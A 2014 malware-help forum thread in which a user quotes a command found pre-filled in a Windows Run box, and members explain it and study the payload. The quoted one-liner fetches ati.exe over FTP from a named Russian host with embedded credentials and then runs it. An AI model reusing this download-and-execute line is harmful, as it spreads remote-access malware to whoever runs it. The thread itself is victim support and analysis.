Please help me analyze this command I found in "run" box on PC

Discussion in 'malware problems & news' started by TexasDon, May 6, 2014.

Thread Status:
Not open for further replies.
  1. TexasDon

    TexasDon Registered Member

    Joined:
    May 6, 2014
    Posts:
    1
    I was checking auto logon and hit the run box. The box came up pre-populated with this:

    cmd /c echo open s2.zalivalka.ru 21 >> ik &echo user u113218 4af438 >> ik &echo binary >> ik &echo get ati.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &ati.exe &exit

    I get that the website is in Russia and it has some FTP commands.

    How would I trace it and how would I check to see if other PC's in network are similarly affected?

    It has AVAST and I have run MalwareBytes.

    Thanks
     
  2. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
  3. 1PW

    1PW Registered Member

    Joined:
    Apr 2, 2010
    Posts:
    701
    Location:
    North of the 38th parallel.
    I would consider running full scans with both and auditing your overall system security defenses.

    Yes - not good at all...
     
  4. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    That would have run the EXE file after downloading it. IMO you should assume the OS is currently compromised. I'll leave more detailed advice to the moderators, as I'm neither a security expert nor much of a Windows guy.

    (I'll get back to you later re the FTP site, if it's still up. Don't want to touch it with a barge pole until I can set up a secure, disposable environment for doing so.)
     
  5. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,073
    When connected to ftp using those credentials I got three files: gotcha, RMS3.exe, RMS3-.exe. Executables will be sent to VT and I'll post results here.
     
  6. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,073
    Here are results:

    ~ VirusTotal Results Removed per Policy - JRViejo ~
     
    Last edited by a moderator: May 6, 2014
  7. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    I deleted the links but left the SHA so people can search on VT if they want. Thanks :thumb:
     
  8. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,073
    Should I do the same? Is there a problem if complete urls to test results are posted? I would worry about whole command being posted, though. Somebody could replace ati.exe with rms3.exe...
     
  9. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    Afaik ANY VT results is against the TOS. And mods rarely leave any MD5 or SHA behind when they delete the links so people can make a search on VT is they like. So I thought I delete the VT links but leave the SHA so people can search for the results. Since I believe posting MD5, SHA etc..is not against the TOS. :doubt:

    You do as you like, nothing serious will happen just that the links might be deleted :)
     
  10. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    hqsec beat me to it...

    VT says those are probably remote access tools. In any case it's obvious enough that they're malware, even if they're not the original file. Probably just updated or something.

    @TexasDon: you should get some help cleaning this thing up. Not sure what the policy around here is re active infections at this point, but there are forums dedicated to such problems, e.g. BleepingComputer:

    http://www.bleepingcomputer.com/forums/

    You might want to post something there - from a clean OS.
     
  11. JRViejo

    JRViejo Global Moderator

    Joined:
    Jul 9, 2008
    Posts:
    20,958
    Location:
    U.S.A.
Loading...
Thread Status:
Not open for further replies.